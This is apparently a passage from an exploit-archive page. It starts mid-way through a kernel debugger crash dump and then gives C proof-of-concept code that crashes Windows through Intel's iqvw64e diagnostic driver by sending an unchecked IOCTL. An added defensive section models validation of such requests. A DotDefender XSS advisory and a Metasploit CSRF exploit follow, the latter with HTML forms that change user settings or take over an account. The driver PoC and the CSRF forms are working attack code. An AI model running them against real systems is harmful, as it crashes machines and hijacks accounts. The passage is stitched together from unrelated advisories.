fffff800`036cb502 488d8c2400010000 lea rcx,[rsp+100h] _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0a fffff880`0653b210 fffff880`05a0bfd2 nt!KiPageFault+0x23a 0a fffff880`0653b210 fffff880`05a0bfd2 nt!KiPageFault+0x23a rax=0000000000000000 rbx=0000000000000001 rcx=0000000000000003 rdx=000000000000008a rsi=fffffa804d1084d0 rdi=00000000deadbeef rip=fffff800036ca07a rsp=fffff8800653b210 rbp=fffff8800653b290 r8=0000000000000065 r9=0000000000000000 r10=0000000000000000 r11=fffff88006539610 r12=0000000000000003 r13=0000000000000001 r14=0000000000000001 r15=fffffa804aac7b00 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 nt!KiPageFault+0x23a: fffff800`036ca07a 440f20c0 mov rax,cr8 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0b fffff880`0653b3a0 fffff880`05a091ac iqvw64e+0x3fd2 0b fffff880`0653b3a0 fffff880`05a091ac iqvw64e+0x3fd2 rax=0000f88005a696d1 rbx=0000000000000001 rcx=00000000deadbeef rdx=0000000080862013 rsi=fffffa804d1084d0 rdi=00000000deadbeef rip=fffff88005a0bfd2 rsp=fffff8800653b3a0 rbp=fffff8800653bb60 r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000 r11=fffff8800653b898 r12=0000000000000003 r13=0000000000000001 r14=0000000000000001 r15=fffffa804aac7b00 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 iqvw64e+0x3fd2: fffff880`05a0bfd2 488b11 mov rdx,qword ptr [rcx] _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0c fffff880`0653b8a0 fffff800`039e80f7 iqvw64e+0x11ac 0c fffff880`0653b8a0 fffff800`039e80f7 iqvw64e+0x11ac rax=0000f88005a696d1 rbx=fffffa804d1084d0 rcx=00000000deadbeef rdx=0000000080862013 rsi=fffffa804d1084d0 rdi=fffffa804d01e160 rip=fffff88005a091ac rsp=fffff8800653b8a0 rbp=fffff8800653bb60 r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000 r11=fffff8800653b898 r12=0000000000000003 r13=0000000000000001 r14=0000000000000001 r15=fffffa804aac7b00 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 iqvw64e+0x11ac: fffff880`05a091ac 8bd8 mov 
ebx,eax _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0d fffff880`0653b8d0 fffff800`039e8956 nt!IopXxxControlFile+0x607 0d fffff880`0653b8d0 fffff800`039e8956 nt!IopXxxControlFile+0x607 rax=0000f88005a696d1 rbx=fffffa804d1084d0 rcx=00000000deadbeef rdx=0000000080862013 rsi=fffffa804d1084d0 rdi=fffffa804d01e160 rip=fffff800039e80f7 rsp=fffff8800653b8d0 rbp=fffff8800653bb60 r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000 r11=fffff8800653b898 r12=0000000000000003 r13=0000000000000001 r14=0000000000000001 r15=fffffa804aac7b00 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 nt!IopXxxControlFile+0x607: fffff800`039e80f7 448be0 mov r12d,eax _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0e fffff880`0653ba00 fffff800`036cb113 nt!NtDeviceIoControlFile+0x56 0e fffff880`0653ba00 fffff800`036cb113 nt!NtDeviceIoControlFile+0x56 rax=0000f88005a696d1 rbx=fffffa804c800060 rcx=00000000deadbeef rdx=0000000080862013 rsi=000000000021e8b8 rdi=fffff8800653ba88 rip=fffff800039e8956 rsp=fffff8800653ba00 rbp=fffff8800653bb60 r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000 r11=fffff8800653b898 r12=000000007efdb000 r13=000000000021fd20 r14=000000000021e910 r15=0000000073b02450 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 nt!NtDeviceIoControlFile+0x56: fffff800`039e8956 4883c468 add rsp,68h _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0f fffff880`0653ba70 00000000`73b02e09 nt!KiSystemServiceCopyEnd+0x13 0f fffff880`0653ba70 00000000`73b02e09 nt!KiSystemServiceCopyEnd+0x13 rax=0000f88005a696d1 rbx=fffffa804c800060 rcx=00000000deadbeef rdx=0000000080862013 rsi=000000000021e8b8 rdi=fffff8800653ba88 rip=fffff800036cb113 rsp=fffff8800653ba70 rbp=fffff8800653bb60 r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000 r11=fffff8800653b898 r12=000000007efdb000 r13=000000000021fd20 r14=000000000021e910 r15=0000000073b02450 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 
nt!KiSystemServiceCopyEnd+0x13: fffff800`036cb113 65ff042538220000 inc dword ptr gs:[2238h] _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 10 00000000`0021e898 00000000`73b02944 wow64cpu!CpupSyscallStub+0x9 10 00000000`0021e898 00000000`73b02944 wow64cpu!CpupSyscallStub+0x9 rax=0000f88005a696d1 rbx=0000000000000000 rcx=00000000deadbeef rdx=0000000080862013 rsi=0000000000000000 rdi=0000000000000034 rip=0000000073b02e09 rsp=000000000021e898 rbp=00000000001dfe68 r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000 r11=fffff8800653b898 r12=000000007efdb000 r13=000000000021fd20 r14=000000000021e910 r15=0000000073b02450 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 wow64cpu!CpupSyscallStub+0x9: 00000000`73b02e09 c3 ret _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 11 00000000`0021e8a0 00000000`73b7d286 wow64cpu!DeviceIoctlFileFault+0x31 11 00000000`0021e8a0 00000000`73b7d286 wow64cpu!DeviceIoctlFileFault+0x31 rax=0000f88005a696d1 rbx=0000000000000000 rcx=00000000deadbeef rdx=0000000080862013 rsi=0000000000000000 rdi=0000000000000034 rip=0000000073b02944 rsp=000000000021e8a0 rbp=00000000001dfe68 r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000 r11=fffff8800653b898 r12=000000007efdb000 r13=000000000021fd20 r14=000000000021e910 r15=0000000073b02450 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 wow64cpu!DeviceIoctlFileFault+0x31: 00000000`73b02944 488b4c2420 mov rcx,qword ptr [rsp+20h] _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 12 00000000`0021e960 00000000`73b7c69e wow64!RunCpuSimulation+0xa 12 00000000`0021e960 00000000`73b7c69e wow64!RunCpuSimulation+0xa rax=0000f88005a696d1 rbx=0000000000000000 rcx=00000000deadbeef rdx=0000000080862013 rsi=0000000000000002 rdi=000000000021f4b0 rip=0000000073b7d286 rsp=000000000021e960 rbp=000000000021e9d0 r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000 r11=fffff8800653b898 r12=000000000021fd20 r13=0000000000000000 r14=0000000000000001 
r15=ffffffffffffffff iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 wow64!RunCpuSimulation+0xa: 00000000`73b7d286 eb00 jmp wow64!RunCpuSimulation+0xc (00000000`73b7d288) _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 13 00000000`0021e9b0 00000000`773f4966 wow64!Wow64LdrpInitialize+0x42a 13 00000000`0021e9b0 00000000`773f4966 wow64!Wow64LdrpInitialize+0x42a rax=0000f88005a696d1 rbx=0000000000000000 rcx=00000000deadbeef rdx=0000000080862013 rsi=0000000000000002 rdi=000000000021f4b0 rip=0000000073b7c69e rsp=000000000021e9b0 rbp=000000000021e9d0 r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000 r11=fffff8800653b898 r12=000000000021fd20 r13=0000000000000000 r14=0000000000000001 r15=ffffffffffffffff iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 wow64!Wow64LdrpInitialize+0x42a: 00000000`73b7c69e cc int 3 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 14 00000000`0021ef00 00000000`773f1937 ntdll!LdrpInitializeProcess+0x17e3 14 00000000`0021ef00 00000000`773f1937 ntdll!LdrpInitializeProcess+0x17e3 rax=0000f88005a696d1 rbx=0000000000000000 rcx=00000000deadbeef rdx=0000000080862013 rsi=00000000774e2670 rdi=00000000774b5978 rip=00000000773f4966 rsp=000000000021ef00 rbp=00000000773b0000 r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000 r11=fffff8800653b898 r12=00000000774e2520 r13=0000000000000000 r14=00000000774e2650 r15=000000007efdf000 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 ntdll!LdrpInitializeProcess+0x17e3: 00000000`773f4966 eb00 jmp ntdll!LdrpInitializeProcess+0x1c12 (00000000`773f4968) _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 15 00000000`0021f3f0 00000000`773dc34e ntdll! ?? ::FNODOBFM::`string'+0x28ff0 15 00000000`0021f3f0 00000000`773dc34e ntdll! ?? 
::FNODOBFM::`string'+0x28ff0 rax=0000f88005a696d1 rbx=000000007efdf000 rcx=00000000deadbeef rdx=0000000080862013 rsi=000000007efdb000 rdi=0000000000000000 rip=00000000773f1937 rsp=000000000021f3f0 rbp=0000000000000000 r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000 r11=fffff8800653b898 r12=000000000021f4b0 r13=00000000773b0000 r14=0000000000000001 r15=000000007740a220 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 ntdll! ?? ::FNODOBFM::`string'+0x28ff0: 00000000`773f1937 89442430 mov dword ptr [rsp+30h],eax _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 16 00000000`0021f460 00000000`00000000 ntdll!LdrInitializeThunk+0xe 16 00000000`0021f460 00000000`00000000 ntdll!LdrInitializeThunk+0xe rax=0000f88005a696d1 rbx=000000000021f4b0 rcx=00000000deadbeef rdx=0000000080862013 rsi=0000000000000000 rdi=0000000000000000 rip=00000000773dc34e rsp=000000000021f460 rbp=0000000000000000 r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000 r11=fffff8800653b898 r12=0000000000000000 r13=0000000000000000 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 ntdll!LdrInitializeThunk+0xe: 00000000`773dc34e b201 mov dl,1 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 00 fffff880`06539988 fffff800`037bba62 nt!RtlpBreakWithStatusInstruction 3: kd> dd fffff8800653b8d0 fffff880`0653b8d0 80862013 00000000 0653bb60 fffff880 fffff880`0653b8e0 4d1084d0 fffffa80 4d01e160 fffffa80 fffff880`0653b8f0 746c6644 00000000 0653b928 fffff880 fffff880`0653b900 0653b968 fffff880 00000000 00000000 fffff880`0653b910 00000000 00000000 00000001 00000000 fffff880`0653b920 4c804e01 00000000 4d1084d0 fffffa80 fffff880`0653b930 00000000 00000000 00000000 00000000 fffff880`0653b940 4d01e160 fffffa80 76bdd0af 00000000 3: kd> !process 0 0 **** NT ACTIVE PROCESS DUMP **** PROCESS fffffa8048f5f740 SessionId: none Cid: 0004 Peb: 00000000 ParentCid: 0000 DirBase: 00187000 ObjectTable: fffff8a0000017f0 
HandleCount: 535. Image: System . . . PROCESS fffffa804d0f29e0 SessionId: 1 Cid: 0d9c Peb: 7efdf000 ParentCid: 0afc DirBase: 1aac4b000 ObjectTable: fffff8a016893450 HandleCount: 13. Image: ConsoleApplication7.exe . . . 3: kd> !handle fffffa804d0f29e0 7 PROCESS fffffa804d0f29e0 SessionId: 1 Cid: 0d9c Peb: 7efdf000 ParentCid: 0afc DirBase: 1aac4b000 ObjectTable: fffff8a016893450 HandleCount: 13. Image: ConsoleApplication7.exe Handle table at fffff8a016893450 with 13 entries in use Invalid Handle: 0x4d0f29e0 3: kd> !process fffffa804d0f29e0 f PROCESS fffffa804d0f29e0 SessionId: 1 Cid: 0d9c Peb: 7efdf000 ParentCid: 0afc DirBase: 1aac4b000 ObjectTable: fffff8a016893450 HandleCount: 13. Image: ConsoleApplication7.exe VadRoot fffffa804a9eb220 Vads 30 Clone 0 Private 110. Modified 0. Locked 0. DeviceMap fffff8a0022b5570 Token fffff8a01685d060 ElapsedTime 00:00:39.608 UserTime 00:00:00.000 KernelTime 00:00:00.000 QuotaPoolUsage[PagedPool] 20128 QuotaPoolUsage[NonPagedPool] 3360 Working Set Sizes (now,min,max) (510, 50, 345) (2040KB, 200KB, 1380KB) PeakWorkingSetSize 510 VirtualSize 11 Mb PeakVirtualSize 11 Mb PageFaultCount 529 MemoryPriority BACKGROUND BasePriority 8 CommitCharge 140 Job fffffa804d0fc080 THREAD fffffa804c800060 Cid 0d9c.0da0 Teb: 000000007efdb000 Win32Thread: 0000000000000000 RUNNING on processor 3 IRP List: fffffa804d01e160: (0006,0118) Flags: 00060000 Mdl: 00000000 Not impersonating DeviceMap fffff8a0022b5570 Owning Process fffffa804d0f29e0 Image: ConsoleApplication7.exe Attached Process N/A Image: N/A Wait Start TickCount 440956 Ticks: 0 Context Switch Count 31 IdealProcessor: 3 UserTime 00:00:00.000 KernelTime 00:00:00.000 *** WARNING: Unable to verify checksum for ConsoleApplication7.exe *** ERROR: Module load completed but symbols could not be loaded for ConsoleApplication7.exe Win32 Start Address ConsoleApplication7 (0x0000000000041354) Stack Init fffff8800653bc70 Current fffff8800653b530 Base fffff8800653c000 Limit fffff88006536000 Call 0 Priority 
11 BasePriority 8 UnusualBoost 0 ForegroundBoost 2 IoPriority 2 PagePriority 5 Child-SP RetAddr Call Site fffff880`06539988 fffff800`037bba62 nt!RtlpBreakWithStatusInstruction fffff880`06539990 fffff800`037bc84e nt!KiBugCheckDebugBreak+0x12 fffff880`065399f0 fffff800`036cbf84 nt!KeBugCheck2+0x71e fffff880`0653a0c0 fffff800`036cb429 nt!KeBugCheckEx+0x104 fffff880`0653a100 fffff800`036cad7c nt!KiBugCheckDispatch+0x69 fffff880`0653a240 fffff800`036f6a4d nt!KiSystemServiceHandler+0x7c fffff880`0653a280 fffff800`036f5825 nt!RtlpExecuteHandlerForException+0xd fffff880`0653a2b0 fffff800`037067b1 nt!RtlDispatchException+0x415 fffff880`0653a990 fffff800`036cb502 nt!KiDispatchException+0x135 fffff880`0653b030 fffff800`036ca07a nt!KiExceptionDispatch+0xc2 fffff880`0653b210 fffff880`05a0bfd2 nt!KiPageFault+0x23a (TrapFrame @ fffff880`0653b210) fffff880`0653b3a0 fffff880`05a091ac iqvw64e+0x3fd2 fffff880`0653b8a0 fffff800`039e80f7 iqvw64e+0x11ac fffff880`0653b8d0 fffff800`039e8956 nt!IopXxxControlFile+0x607 fffff880`0653ba00 fffff800`036cb113 nt!NtDeviceIoControlFile+0x56 fffff880`0653ba70 00000000`73b02e09 nt!KiSystemServiceCopyEnd+0x13 (TrapFrame @ fffff880`0653bae0) 00000000`0021e898 00000000`73b02944 wow64cpu!CpupSyscallStub+0x9 00000000`0021e8a0 00000000`73b7d286 wow64cpu!DeviceIoctlFileFault+0x31 00000000`0021e960 00000000`73b7c69e wow64!RunCpuSimulation+0xa 00000000`0021e9b0 00000000`773f4966 wow64!Wow64LdrpInitialize+0x42a 00000000`0021ef00 00000000`773f1937 ntdll!LdrpInitializeProcess+0x17e3 00000000`0021f3f0 00000000`773dc34e ntdll! ?? ::FNODOBFM::`string'+0x28ff0 00000000`0021f460 00000000`00000000 ntdll!LdrInitializeThunk+0xe 3: kd> !irp fffffa804d01e160 Irp is active with 1 stacks 1 is current (= 0xfffffa804d01e230) No Mdl: No System Buffer: Thread fffffa804c800060: Irp stack trace. 
cmd flg cl Device File Completion-Context >[ e, 0] 5 0 fffffa804aac7b00 fffffa804d1084d0 00000000-00000000 \FileSystem\iqvw64e Args: 00000000 00000000 80862013 deadbeef 3: kd> !object fffffa804aac7b00 Object: fffffa804aac7b00 Type: (fffffa804900af30) Device ObjectHeader: fffffa804aac7ad0 (new version) HandleCount: 0 PointerCount: 2 Directory Object: fffff8a000010060 Name: Nal 3: kd> dt_IO_STACK_LOCATION 0xfffffa804d01e230 ntdll!_IO_STACK_LOCATION +0x000 MajorFunction : 0xe '' +0x001 MinorFunction : 0 '' +0x002 Flags : 0x5 '' +0x003 Control : 0 '' +0x008 Parameters : <unnamed-tag> +0x028 DeviceObject : 0xfffffa80`4aac7b00 _DEVICE_OBJECT +0x030 FileObject : 0xfffffa80`4d1084d0 _FILE_OBJECT +0x038 CompletionRoutine : (null) +0x040 Context : (null) 3: kd> !devobj 0xfffffa80`4aac7b00 7 Device object (fffffa804aac7b00) is for: Nal \FileSystem\iqvw64e DriverObject fffffa804b0f4d70 Current Irp 00000000 RefCount 1 Type 00008086 Flags 00000044 Dacl fffff9a10008c391 DevExt fffffa804aac7c50 DevObjExt fffffa804aac7c68 ExtensionFlags (0x00000800) DOE_DEFAULT_SD_PRESENT Characteristics (0000000000) Device queue is not busy. 
3: kd> !drvobj fffffa804b0f4d70 7 Driver object (fffffa804b0f4d70) is for: \FileSystem\iqvw64e Driver Extension List: (id , addr) Device Object list: fffffa804aac7b00 DriverEntry: fffff88005fda200 iqvw64e DriverStartIo: 00000000 DriverUnload: fffff88005a09010 iqvw64e AddDevice: 00000000 Dispatch routines: [00] IRP_MJ_CREATE fffff88005a09090 iqvw64e+0x1090 [01] IRP_MJ_CREATE_NAMED_PIPE fffff800036b0e30 nt!IopInvalidDeviceRequest [02] IRP_MJ_CLOSE fffff88005a090f0 iqvw64e+0x10f0 [03] IRP_MJ_READ fffff800036b0e30 nt!IopInvalidDeviceRequest [04] IRP_MJ_WRITE fffff800036b0e30 nt!IopInvalidDeviceRequest [05] IRP_MJ_QUERY_INFORMATION fffff800036b0e30 nt!IopInvalidDeviceRequest [06] IRP_MJ_SET_INFORMATION fffff800036b0e30 nt!IopInvalidDeviceRequest [07] IRP_MJ_QUERY_EA fffff800036b0e30 nt!IopInvalidDeviceRequest [08] IRP_MJ_SET_EA fffff800036b0e30 nt!IopInvalidDeviceRequest [09] IRP_MJ_FLUSH_BUFFERS fffff800036b0e30 nt!IopInvalidDeviceRequest [0a] IRP_MJ_QUERY_VOLUME_INFORMATION fffff800036b0e30 nt!IopInvalidDeviceRequest [0b] IRP_MJ_SET_VOLUME_INFORMATION fffff800036b0e30 nt!IopInvalidDeviceRequest [0c] IRP_MJ_DIRECTORY_CONTROL fffff800036b0e30 nt!IopInvalidDeviceRequest [0d] IRP_MJ_FILE_SYSTEM_CONTROL fffff800036b0e30 nt!IopInvalidDeviceRequest [0e] IRP_MJ_DEVICE_CONTROL fffff88005a09150 iqvw64e+0x1150 [0f] IRP_MJ_INTERNAL_DEVICE_CONTROL fffff800036b0e30 nt!IopInvalidDeviceRequest [10] IRP_MJ_SHUTDOWN fffff800036b0e30 nt!IopInvalidDeviceRequest [11] IRP_MJ_LOCK_CONTROL fffff800036b0e30 nt!IopInvalidDeviceRequest [12] IRP_MJ_CLEANUP fffff800036b0e30 nt!IopInvalidDeviceRequest [13] IRP_MJ_CREATE_MAILSLOT fffff800036b0e30 nt!IopInvalidDeviceRequest [14] IRP_MJ_QUERY_SECURITY fffff800036b0e30 nt!IopInvalidDeviceRequest [15] IRP_MJ_SET_SECURITY fffff800036b0e30 nt!IopInvalidDeviceRequest [16] IRP_MJ_POWER fffff800036b0e30 nt!IopInvalidDeviceRequest [17] IRP_MJ_SYSTEM_CONTROL fffff800036b0e30 nt!IopInvalidDeviceRequest [18] IRP_MJ_DEVICE_CHANGE fffff800036b0e30 
nt!IopInvalidDeviceRequest
[19] IRP_MJ_QUERY_QUOTA                  fffff800036b0e30  nt!IopInvalidDeviceRequest
[1a] IRP_MJ_SET_QUOTA                    fffff800036b0e30  nt!IopInvalidDeviceRequest
[1b] IRP_MJ_PNP                          fffff800036b0e30  nt!IopInvalidDeviceRequest

*/

#include <windows.h>
#include <stdio.h>
#include <conio.h>

int main(int argc, char **argv)
{
    HANDLE hDevice;
    DWORD bret;
    char szDevice[] = "\\\\.\\Nal";

    printf("--[ Intel Network Adapter Diagnostic Driver DoS ]--\n");
    printf("Opening handle to driver..\n");

    // CreateFile(lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes, dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile)
    // The device's DACL grants everyone read/write access, so no privilege is needed to open \\.\Nal.
    if ((hDevice = CreateFileA(szDevice, GENERIC_READ | GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, NULL)) != INVALID_HANDLE_VALUE) {
        printf("Device %s successfully opened!\n", szDevice);
        printf("\tHandle: %p\n", hDevice);
    } else {
        printf("Error: Error opening device %s (GetLastError = %lu)\n", szDevice, GetLastError());
        return 1;   // do not issue the IOCTL on an invalid handle
    }

    printf("\nPress any key to DoS..");
    _getch();

    bret = 0;
    // Affected IOCTL codes: 0x80862013, 0x8086200B, 0x8086200F, 0x80862007
    // All four are METHOD_NEITHER, so lpInBuffer reaches the driver as a raw user pointer
    // (Type3InputBuffer); the driver dereferences it without probing, which is the
    // "mov rdx,qword ptr [rcx]" with rcx = 0xdeadbeef in the crash dump above.
    // DeviceIoControl(hDevice, dwIoControlCode, lpInBuffer, nInBufferSize, lpOutBuffer, nOutBufferSize, lpBytesReturned, lpOverlapped)
    if (!DeviceIoControl(hDevice, 0x80862013, (LPVOID)0xdeadbeef, 0x0, (LPVOID)0xdeadbeef, 0x0, &bret, NULL)) {
        printf("DeviceIoControl Error - bytes returned %#x\n", bret);
    }

    CloseHandle(hDevice);
    return 0;
}

Source
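The following is an added example and is not part of the advisory above, the PoC, or Intel's driver. It decodes the four affected IOCTL codes the way the kernel's CTL_CODE macro lays them out, which confirms the advisory's two claims from the numbers alone: every code is METHOD_NEITHER (low two bits = 3, so lpInBuffer arrives as a raw Type3InputBuffer pointer) and FILE_ANY_ACCESS (bits 15..14 = 0), and the DeviceType 0x8086 matches the "Type 00008086" shown by !devobj. It then models, in user mode, the checks a METHOD_NEITHER dispatch routine must do before the "mov rdx,[rcx]" that crashed at iqvw64e+0x3fd2. The probe address constant, the request structure size and the status codes are assumptions for the model; a real driver would use ProbeForRead/ProbeForWrite inside __try/__except rather than these plain comparisons.

```c
#include <stdint.h>
#include <stdio.h>

/* CTL_CODE layout: DeviceType<<16 | Access<<14 | Function<<2 | Method */
#define METHOD_NEITHER   3
#define FILE_ANY_ACCESS  0

struct ioctl_fields {
    uint32_t device_type;   /* bits 31..16 */
    uint32_t access;        /* bits 15..14 */
    uint32_t function;      /* bits 13..2  */
    uint32_t method;        /* bits  1..0  */
};

/* Inverse of the CTL_CODE(DeviceType, Function, Method, Access) macro. */
struct ioctl_fields decode_ioctl(uint32_t code)
{
    struct ioctl_fields f;
    f.device_type = code >> 16;
    f.access      = (code >> 14) & 0x3;
    f.function    = (code >> 2) & 0xFFF;
    f.method      = code & 0x3;
    return f;
}

/* Assumed stand-in for MmUserProbeAddress on x64 Windows; in a driver this is
 * a kernel variable read at run time, not a constant. */
#define MODEL_USER_PROBE_ADDRESS 0x000007FFFFFF0000ULL

/* Size of the request structure behind Type3InputBuffer: assumed, since the
 * advisory does not document the driver's structures. */
#define MODEL_REQUEST_SIZE 8u

enum req_status {
    REQ_OK = 0,
    REQ_E_METHOD = -1,     /* this model only covers METHOD_NEITHER requests  */
    REQ_E_LENGTH = -2,     /* nInBufferSize too small for the request struct   */
    REQ_E_NULL = -3,       /* NULL Type3InputBuffer                            */
    REQ_E_OVERFLOW = -4,   /* pointer + length wraps around                    */
    REQ_E_RANGE = -5       /* buffer reaches into kernel space                 */
};

/* The checks the crashed handler skipped: length, NULL, arithmetic overflow
 * and user-range (what ProbeForRead enforces).  Passing them only proves the
 * range is user-mode; the pages may still be unmapped (0xdeadbeef is), so a
 * real driver must also perform the access itself inside __try/__except. */
int validate_neither_request(uint32_t code, uint64_t user_ptr, uint32_t in_len)
{
    struct ioctl_fields f = decode_ioctl(code);

    if (f.method != METHOD_NEITHER)
        return REQ_E_METHOD;
    if (in_len < MODEL_REQUEST_SIZE)
        return REQ_E_LENGTH;
    if (user_ptr == 0)
        return REQ_E_NULL;
    if (user_ptr + in_len < user_ptr)
        return REQ_E_OVERFLOW;
    if (user_ptr + in_len > MODEL_USER_PROBE_ADDRESS)
        return REQ_E_RANGE;
    return REQ_OK;
}

int main(void)
{
    const uint32_t affected[] = { 0x80862013, 0x8086200B, 0x8086200F, 0x80862007 };
    size_t i;

    for (i = 0; i < sizeof affected / sizeof affected[0]; i++) {
        struct ioctl_fields f = decode_ioctl(affected[i]);
        printf("0x%08X: DeviceType=0x%04X Function=0x%03X Method=%u (%s) Access=%u\n",
               affected[i], f.device_type, f.function, f.method,
               f.method == METHOD_NEITHER ? "METHOD_NEITHER" : "other", f.access);
    }

    /* Exactly what the PoC sends: lpInBuffer = 0xdeadbeef, nInBufferSize = 0.
     * The length check alone rejects it before any dereference. */
    printf("PoC request status: %d\n",
           validate_neither_request(0x80862013, 0xdeadbeefULL, 0));
    return 0;
}
```

The PoC's request is rejected by the length check, but note that 0xdeadbeef with a plausible length passes every range test: ProbeForRead would accept it too, and the fault only shows up at the access, which is why the probe must be paired with a __try/__except around the copy out of the user buffer (or the driver should avoid METHOD_NEITHER and let the I/O manager buffer the request).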
24. Vulnerable soft: Applicure DotDefender (all versions)
Vendor's site: Download dotDefender 5.00 & 5.13
Vulnerabilities: Persistent XSS, Log forging, Potential DoS
When Discovered: 15 March 2015
Discovered by: AkaStep

Under some circumstances it is possible to attack DotDefender's admin interface and, as a result, conduct phishing/log forging/potential Denial of Service against the "Log Viewer" functionality.

The main reason for the vulnerability: DotDefender's developers trust the X-Forwarded-For HTTP header and its variable (which is client-side controllable), and sadly there is no validation/sanitization of that variable and its value.

This vulnerability was successfully tested against the following configurations (in lab/production environments):
1) Apache Traffic Server ===> Apache 2.4
2) Apache 2.4 with mod_proxy.

Tested versions (but other versions may also be affected):
• dotDefender Version: 5.12-13217
• Web Server Type: Apache
• Server Operating System: Linux
• Web Server Version: Unknown

• dotDefender Version: 5.13-13282
• Web Server Type: Apache
• Server Operating System: Linux
• Web Server Version: Unknown

Read more: http://packetstorm.wowhacker.com/1503-exploits/DotDefender-XSS.pdf
  25. # Exploit Title: Metasploit Project initial User Creation CSRF
# Google Dork: N/A
# Date: 14-2-2015
# Exploit Author: Mohamed Abdelbaset Elnoby (@SymbianSyMoh)
# Vendor Homepage: http://www.metasploit.com/
# Software Link: http://www.rapid7.com/products/metasploit/editions-and-features.jsp
# Version: Free/Pro < 4.11.1 (Update 2015021901)
# Tested on: All OS
# CVE : N/A

Vulnerability: Cross Site Request Forgery - (CSRF)
Info: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

More Details:
After doing some research, I found that the anti-CSRF token "authenticity_token" value is not validated on the local server side, which results in more CSRF attack scenarios across the whole local Metasploit project.

Affected URL(s)/PoC Code(s):

-Change Local Metasploit Project User Settings
<html>
  <body>
    <form action="https://127.0.0.1:3790/users/1" method="POST">
      <input type="hidden" name="utf8" value="?" />
      <input type="hidden" name="_method" value="put" />
      <input type="hidden" name="authenticity_token" value="" />
      <input type="hidden" name="user[fullname]" value="Attacker" />
      <input type="hidden" name="user[email]" value="EMAIL" />
      <input type="hidden" name="user[company]" value="COMPANY" />
      <input type="hidden" name="user[time_zone]" value="Cairo" />
      <input type="hidden" name="commit" value="Save Settings" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>

-Full Local Metasploit Project Account Takeover before setting up the first user settings
<html>
  <body>
    <form action="https://127.0.0.1:3790/users" method="POST">
      <input type="hidden" name="utf8" value="?" />
      <input type="hidden" name="authenticity_token" value="" />
      <input type="hidden" name="user[username]" value="Username" />
      <input type="hidden" name="user[password]" value="PASSWORD" />
      <input type="hidden" name="user[password_confirmation]" value="PASSWORD" />
      <input type="hidden" name="user[fullname]" value="FUll_Name" />
      <input type="hidden" name="user[email]" value="EMAIL" />
      <input type="hidden" name="user[company]" value="COMPANY" />
      <input type="hidden" name="user[time_zone]" value="Cairo" />
      <input type="hidden" name="commit" value="Create Account" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>

More Details/Impact:
-Change Local Metasploit Project User Settings
-Full Local Metasploit Project Account Takeover before setting up the first user settings

Report Timeline:
[-] 14/02/2015: Reported to Rapid7 Security Team
[-] 14/02/2015: Initial Reply from HD Moore acknowledging the vulnerability
[-] 17/02/2015: Reply from "Eray Yilmaz" about the Operation and public disclosure rules
[-] 20/02/2015: Reply from "Eray Yilmaz" about releasing a patch for the vulnerability in place, Fixed in Update 4.11.1 (Update 2015021901), https://community.rapid7.com/docs/DOC-3010
[-] 16/03/2015: Public Disclosure

Thanks
--
Best Regards,
Mohamed Abdelbaset Elnoby
Guru Programmer, Information Security Evangelist & Bug Bounty Hunter.
LinkedIn <https://www.linkedin.com/in/symbiansymoh>
Curriculum Vitae <http://goo.gl/cNrVpL>
Facebook <https://fb.com/symbiansymoh>
Twitter <https://twitter.com/symbiansymoh>

Source
